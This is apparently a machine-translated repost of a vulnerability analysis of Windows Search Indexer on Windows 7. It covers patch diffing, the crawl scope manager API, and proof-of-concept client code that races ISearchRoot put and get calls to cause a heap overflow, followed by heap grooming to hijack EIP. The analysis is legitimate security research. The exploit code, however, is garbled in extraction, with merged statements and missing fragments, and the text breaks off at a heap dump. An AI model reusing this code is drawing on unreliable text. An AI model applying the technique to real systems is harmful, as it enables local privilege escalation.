Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you an example analysis of the local rights enhancement of Windows Search Indexer. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Windows Search Indexer introduction

Windows Search Indexer is a Windows service that handles file indexing for Windows Search, which powers Windows's built-in file search engine, which supports all functions from the start menu search box to Windows Explorer and even the Library function.

Search Indexer helps direct users to the service interface through GUI and indexing options from a GUI perspective, as shown below.

All databases and temporary data during the indexing process are stored as files and managed. Typically, in Windows Service, the entire process is performed using NT AUTHORITY SYSTEM privileges. If there happens to be a logic vulnerability due to modification of the file path, privilege escalation may be triggered. (for example, Symlink attacks)

Given that most of the recent vulnerabilities in Windows Service are LPE vulnerabilities due to logic vulnerabilities, we assume that Search Indexer may have similar vulnerabilities, but this is not the case in our analysis, and we will cover more details later.

Patch comparison

The analysis environment is Windows7 x86 because it has a small update file and is easy to identify differences, we downloaded two patch versions of the module.

You can download them from the Microsoft updates directory:

Patch program version (January program): KB4534314 2

Patch version (February patch): KB4537813 3

We start with the BinDiff of the binary file passed by patch (in this case, there is only one: searchindexer.exe)

Most patches are done in the CSearchCrawlScopeManager and CSearchRoot classes. The former did patch in January, while the latter did patch next month. Both classes contain the same changes, so we focus on patch's CSearchRoot.

The following figure shows the addition of the original code that uses Lock to securely access shared resources. We infer that accessing shared resources will lead to race condition vulnerabilities because the patch consists of putter and getter functions.

Interface interaction

We looked at MSDN to see how to use these classes and found that they are all related to the crawl manager, and we can check the method information for this class.

MSDN says 4:

The crawl scope Manager (CSM) is a set of API that adds, removes, and enumerates search root and scope rules for Windows search indexers. When you want the indexer to start crawling the new container, you can use the CSM setting to search the root directory and set scope rules for searching paths within the root directory.

The CSM interface is as follows:

IEnumSearchRoots

IEnumSearchScopeRules

ISearchCrawlScopeManager

ISearchCrawlScopeManager2

ISearchRoot

ISearchScopeRule

ISearchItem

For example, add, delete, and enumerate search root and scope rules can be written in the following ways:

ISearchCrawlScopeManager tells search engines about the containers to crawl and / or monitor, and the items under the containers to include or exclude. To add a new search, you instantiate the ISearchRoot object, set the root property, and then call ISearchCrawlScopeManager:: AddRoot and pass it to the pointer to the ISearchRoot object.

/ / Add RootInfo & ScopeRule pISearchRoot- > put_RootURL (L "file:///C:\"); pSearchCrawlScopeManager- > AddRoot (pISearchRoot); pSearchCrawlScopeManager- > AddDefaultScopeRule (L "file:///C:\Windows", fInclude, FF_INDEXCOMPLEXURLS); / / Set Registry key pSearchCrawlScopeManager- > SaveAll ()

When we no longer want to index the URL, we can also use ISearchCrawlScopeManager to remove the root from the crawl scope. Deleting a root also deletes all scope rules for that URL. We can uninstall the application, delete all data, and then remove the search root from the crawl scope, and the crawl scope Manager will delete the root and all scope rules associated with that root.

/ / Remove RootInfo & Scope Rule ISearchCrawlScopeManager- > RemoveRoot (pszURL); / / Set Registry key ISearchCrawlScopeManager- > SaveAll ()

CSM uses the IEnumSearchRoots enumeration to search for root. We can use such enumerations to search for root; for a variety of purposes, for example, we might want to display the entire crawl scope in the user interface, or find out whether there are already children of a particular root directory or root directory in the crawl scope.

/ / Display RootInfo PWSTR pszUrl = NULL; pSearchRoot- > get_RootURL (& pszUrl); wcout Next (1, & pSearchScopeRule, NULL) pSearchScopeRule- > get_PatternOrURL (& pszUrl); wcout get_RootURL (& pszUrl); wcout put_RootURL (L "AA"); pSearchManager- > put_RootURL (L "AAAAAAAAAA");} return 0;} DWORD _ stdcall thread_getter (LPVOID param) {ISearchRoot* pISearchRoot = (ISearchRoot*) param; PWSTR get_pszUrl While (1) {pISearchRoot- > get_RootURL (& get_pszUrl);} return 0;}

It's falling apart!

There is no doubt that the race condition was successful before the StringCchCopyW function copied the RootURL data, resulting in a heap overflow.

Hijack EIP

To control EIP, we should create an object for the vulnerable Sever heap.

We wrote the following client code to track the heap status.

Int wmain (int argc, wchar_t * argv []) {CoInitializeEx (NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE); ISearchRoot * pISearchRoot [20]; for (int I = 0; I

Release (); pISearchRoot [5]-> Release (); pISearchRoot [7]-> Release (); pISearchRoot [9]-> Release (); pISearchRoot [11]-> Release (); CreateThread (NULL, 0, thread_putter, (LPVOID) pISearchRoot [13], 0, NULL); CreateThread (NULL, 0, thread_getter, (LPVOID) pISearchRoot [13], 0, NULL); Sleep (500); CoUninitialize (); return 0;}

We found that if the client does not release the pISearchRoot object, the IRpcStubBuffer object will remain on the server heap. We also see that the IRpcStubBuffer object remains near the location of the heap where the vulnerability occurred.

003d58f10 010 >! heap-p-all... 03d58f10 0005 0005 [00] 03d58f18 0001a-(busy)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.